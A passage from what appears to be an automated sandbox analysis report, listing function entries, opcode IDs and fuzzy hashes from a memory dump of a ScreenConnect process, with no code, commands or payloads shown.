                                                                                                                                                                                                                                                        • API String ID: 0-3081347316
                                                                                                                                                                                                                                                        • Opcode ID: d024a5eb4df9512cc2a80f762fc04636c70c552793428c4e02acaee62e43e66a
                                                                                                                                                                                                                                                        • Instruction ID: fb767606d1b2f19f4b86d9917d324c17d862d8780003cb6a09b74f77f226dfad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d024a5eb4df9512cc2a80f762fc04636c70c552793428c4e02acaee62e43e66a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0051EE30B002119FDB249B64DC98B6EFBF2AF84715F14896AE416DB290DF34DC4ACB85
                                                                                                                                                                                                                                                        Function 02A742F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (aq
                                                                                                                                                                                                                                                        • API String ID: 0-600464949
                                                                                                                                                                                                                                                        • Opcode ID: df520a6783adb7411858faf93a1c0c319f25bab2882c7f53daf58c51ae130ac4
                                                                                                                                                                                                                                                        • Instruction ID: adb5a999edf36352f7eeb0a5d37267e9d1ec4ffd465617017da031499072e6d6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df520a6783adb7411858faf93a1c0c319f25bab2882c7f53daf58c51ae130ac4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6441D130A40505CBCB19EF68E9946AEBFB6EF88310F14C565D80A9B245DF34EC07CB91
                                                                                                                                                                                                                                                        Function 02A73480 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ['
                                                                                                                                                                                                                                                        • API String ID: 0-410297704
                                                                                                                                                                                                                                                        • Opcode ID: d37056778ca74b2fbb4c423665d2878c1d437f641a36157fe09eff148ac2e7dd
                                                                                                                                                                                                                                                        • Instruction ID: e7082346f0e256354e6fcacc537179ecd7adeea5abbee8c738119331bfd0d8d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d37056778ca74b2fbb4c423665d2878c1d437f641a36157fe09eff148ac2e7dd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0313736B006015BCB06AB7CAD90A5FBBEAEFC42607408978D029D7344EF34ED098BD1
                                                                                                                                                                                                                                                        Function 02A77688 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c748df58a7a9ef5370447f67ac385f337323ec219ecaafd771cb0074a6ee6454
                                                                                                                                                                                                                                                        • Instruction ID: 1ce13d378451341ed1da9a491008c3eb30356e458d3f9706275bf7ec57c89754
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c748df58a7a9ef5370447f67ac385f337323ec219ecaafd771cb0074a6ee6454
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA51B031D403559FDB02EFB8ED60BD9BBB5FF85304F108565E004AB2A5EB749989CB90
                                                                                                                                                                                                                                                        Function 02A73608 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 169f9d780b8c9cfa9aa91d7eae3e4881c0a04efad1fbbab23af734a3d2c06576
                                                                                                                                                                                                                                                        • Instruction ID: 47119471d62df12636ae1414b2a0684b464495177f942fe0518909f6c76117a9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 169f9d780b8c9cfa9aa91d7eae3e4881c0a04efad1fbbab23af734a3d2c06576
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1518C74A00705CFCF24DF29DD84A5ABBF5EF84324B114AA8E056977A0EF31E846CB94
                                                                                                                                                                                                                                                        Function 02A74940 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3f8de73b5886487c4ae1f39db342f4aa96fc9293f9f31c526068133fed0dda64
                                                                                                                                                                                                                                                        • Instruction ID: 0cd142b04afccef57d1bf3fd7a1fc2b14b7db75f7e6f53ef8b0325bd5b3ff01a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f8de73b5886487c4ae1f39db342f4aa96fc9293f9f31c526068133fed0dda64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4351EA34600A01CFC724CF29D994A66B7F6FF8D324B144A6DD4969B7A4DB31E806CB48
                                                                                                                                                                                                                                                        Function 02A77770 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 08bc9eb7a742b4e84cf82b00eb3b8620c28d96388b231d400ad7d51d62f6b0fe
                                                                                                                                                                                                                                                        • Instruction ID: a158666feacfabb2562d47bc9d628b5256da79b751861ab90deb8cfe0148439d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08bc9eb7a742b4e84cf82b00eb3b8620c28d96388b231d400ad7d51d62f6b0fe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72518034E40309DFDB05EFB8D954B9DBBB6FF89304F108569E404AB294DB74A989CB90
                                                                                                                                                                                                                                                        Function 02A73668 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e7d84be330420852b53e908b71e9c0d8ff5846f31a18a7d4bb90cb1e4813c796
                                                                                                                                                                                                                                                        • Instruction ID: 37d38b9d64aac61b88c4c8da62cc91217fae90e0a9ece0767cb96ab0cd7594cd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7d84be330420852b53e908b71e9c0d8ff5846f31a18a7d4bb90cb1e4813c796
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2413974A00705CFCF24DF29D985A6ABBF5FF84310B114A68E456D77A0EB30E946CB94
                                                                                                                                                                                                                                                        Function 02A73678 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9ed5ec8502a1ca85b71535373ed25a59fb220b5d56c51e8bb2b257a5bca6494b
                                                                                                                                                                                                                                                        • Instruction ID: 51e2d7e142f0a23c0f9d773bb735844ac829172860c0ac60add38733cbe50947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ed5ec8502a1ca85b71535373ed25a59fb220b5d56c51e8bb2b257a5bca6494b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A414B74A00705CFCB24DF29D984A6ABBF5FF84310B114A68E456D77A0EB30E946CB94
                                                                                                                                                                                                                                                        Function 02A76208 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b3e6939374c7fa80ce63d5ce5533e1aacf69ed80a6f70f6843a47f37edb8560e
                                                                                                                                                                                                                                                        • Instruction ID: 9d7462010fb4263ab1555d347c2fed3127b7a29fd6b92d30074416ade8895e5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3e6939374c7fa80ce63d5ce5533e1aacf69ed80a6f70f6843a47f37edb8560e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03416730B506008FCB14DB78D994AAEBBF6EF88710B1545A9E416EB3A0DF309D05CB94
                                                                                                                                                                                                                                                        Function 02A73DC0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ded5438161ac823e8c61d64194ea890bace0a4b73e7522bd66721ae1b0b8521f
                                                                                                                                                                                                                                                        • Instruction ID: 5664c77fbc83320301f08bdd7837576f65e2dc016b1bbd0293018a64c1bc20ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ded5438161ac823e8c61d64194ea890bace0a4b73e7522bd66721ae1b0b8521f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE319C31B102068BDB149F69C994AAFF7F6EF89314F0184AAE406E7294DF31DC018B94
                                                                                                                                                                                                                                                        Function 02A73828 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f162ce420d1e519e5a1e6f07e39ae8bc25fbc44b775b54e4fbd62036972e23c8
                                                                                                                                                                                                                                                        • Instruction ID: aa35e6f395db7bba67f944745a274dfe9ab3cdec6d5e192d921fa113c50b6ce6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f162ce420d1e519e5a1e6f07e39ae8bc25fbc44b775b54e4fbd62036972e23c8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D831AE31F041168FCB04DB68C8956AEBBB6EF88310F1181A9D909EB384DF719D06C796
                                                                                                                                                                                                                                                        Function 02A75548 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2ef79f4dd1c41ad428cf78ac7b5cbd8afee0930cc3fe18a500470f2b50642bf3
                                                                                                                                                                                                                                                        • Instruction ID: 1405f812c7654eff52d210bc72150f39f1d4c63c0677aa59b523cee1fb8a8349
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ef79f4dd1c41ad428cf78ac7b5cbd8afee0930cc3fe18a500470f2b50642bf3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E314F30A00701CFC730DF29D984A66B7F2EF89325B544A1CD896DB7A4EB30E905CB95
                                                                                                                                                                                                                                                        Function 02A7392C Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 985cad3f966cb22eae0a88e7767baadd2da846bc416ba28617945f234aaa3a6d
                                                                                                                                                                                                                                                        • Instruction ID: 8dc5f615925384b2b3cd6664f357f6dba8bc6e64b030195fa051944942436033
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 985cad3f966cb22eae0a88e7767baadd2da846bc416ba28617945f234aaa3a6d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6219126A0E2E04FCF1397385CB16E57F749F8754474E04C6C9C8AB267C6162D0AC789
                                                                                                                                                                                                                                                        Function 02A75FB7 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7afcfaa1e6bfa5a7b544d5bedaac49528ed6a2bdbb81a1680ea34da90ebb29b0
                                                                                                                                                                                                                                                        • Instruction ID: c2e5d33105fb375316a7e80d4e2769a1bc9877dfac8778f38555a03f18688442
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7afcfaa1e6bfa5a7b544d5bedaac49528ed6a2bdbb81a1680ea34da90ebb29b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92110036B40A001FC325D7299E81B57BBEBDFC1654BA8C96AE469CB241EF21DC028394
                                                                                                                                                                                                                                                        Function 02A750C1 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e7ef07947d8fdd114dcbd8158840b3f7bf2fd33828dc2e36f90fd194d0a25fcc
                                                                                                                                                                                                                                                        • Instruction ID: ac3caa91411f47dceb851367415914f0cce213f18ea573dd0e59c67707ebf650
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7ef07947d8fdd114dcbd8158840b3f7bf2fd33828dc2e36f90fd194d0a25fcc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75110535B402045BDB06EB6CEA91B6E7FB3EFC4220F048565D405AB394DF30AE09CBA1
                                                                                                                                                                                                                                                        Function 02A74B70 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ac884cf0fe7bd0b88ad101427b301c41f82d2ff74d6f14b52f7fd86ea77fae3c
                                                                                                                                                                                                                                                        • Instruction ID: 40e02a0c2fe026bdf18a2b992ce96e4188b4f5808a1bea42db10603ac5e2709a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac884cf0fe7bd0b88ad101427b301c41f82d2ff74d6f14b52f7fd86ea77fae3c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0421FC316006058FC734DF65DD48696BBF5EF89324B108A2DD492976A1DF31E94ACF90
                                                                                                                                                                                                                                                        Function 02A750D0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8006c12f2fd88f362bff7115b70ed30963146637566e1e0bb48cfdead321e3c0
                                                                                                                                                                                                                                                        • Instruction ID: 9eccf6b6827a5e624f860e110bc0e68580b0d44888595e8986d46bd2362a2d7b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8006c12f2fd88f362bff7115b70ed30963146637566e1e0bb48cfdead321e3c0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7911D335B402045BDB05EB6CDA81B6EBBA7EFC4360F408565D505AB398DF70AE058BD1
                                                                                                                                                                                                                                                        Function 02A74F40 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 02a94dbf32f183e52c1c07785eef3a9a13d387409b46d57d9103cf145f251a35
                                                                                                                                                                                                                                                        • Instruction ID: 639256f7f9eb559a31377e89c2b2c46e941955f346a43a8ecd907912827163fe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02a94dbf32f183e52c1c07785eef3a9a13d387409b46d57d9103cf145f251a35
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A11543690010A9FCF01DFA8C9809DEBBF5EF49314F118556E504FB260DB36AA1ACB90
                                                                                                                                                                                                                                                        Function 02A75658 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a51f4a9b9ed6a4515f3824b0a6b08cfbe7d91d74ff6855bdc8599b0514cf9d6e
                                                                                                                                                                                                                                                        • Instruction ID: e8b7c24a73d46624f6554b0350ab146bcf1464a3c5078624d260ca269792b161
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a51f4a9b9ed6a4515f3824b0a6b08cfbe7d91d74ff6855bdc8599b0514cf9d6e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59118E71F00205AFDB14DB69CC40AAFB7B6AFC4310F588476D954D7264DB729A01CB94
                                                                                                                                                                                                                                                        Function 02A76E58 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0c730d5845d1ba33ed06cb14a6df47f46e890678dd058c91e36ae202d4d6f71e
                                                                                                                                                                                                                                                        • Instruction ID: e361ef024f19a9a31b290a636be9ad9fde0e8b4336920e7d2103ed4f13a95d31
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c730d5845d1ba33ed06cb14a6df47f46e890678dd058c91e36ae202d4d6f71e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D012436B007205BCB058A1CEC416ABBBEEEFC8660B108A2AE404DB340DFB1DD058BC4
                                                                                                                                                                                                                                                        Function 02A75035 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e446a8d4407881e442d4d82b14c13b7c911de50200d3cbfa5dabeee0507bdb39
                                                                                                                                                                                                                                                        • Instruction ID: 9661ca6cbd1c591d565ec4020f4999a1d9ec1cf92cff10959666ace6027fbdfd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e446a8d4407881e442d4d82b14c13b7c911de50200d3cbfa5dabeee0507bdb39
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE115B31940049DFCF05DFA8D984AECBBB2EF84314B95C855E405AB129DB31E94BCBA4
                                                                                                                                                                                                                                                        Function 02A75648 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a249d45c74cc29c3075f4836d3e5da1288155b15b62944e69a95bfb0be804a8b
                                                                                                                                                                                                                                                        • Instruction ID: 316c793c19a842e12d1ab31aa1b8e99f73239bcf69af016761656c05b95734ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a249d45c74cc29c3075f4836d3e5da1288155b15b62944e69a95bfb0be804a8b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A211E172E00204AEDB10DF68CC40BEEBBB6EF84301F58886AD954DB164DB729A01CB94
                                                                                                                                                                                                                                                        Function 02A74F50 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2248d55b2366c5ebfa6f9ce51c22242fd578a3bcd59cbcc6b1be9929d29efa62
                                                                                                                                                                                                                                                        • Instruction ID: c58a57225ba6bd35dc65a819e5d0cca358b71a893ecff525488b57cff4057ce3
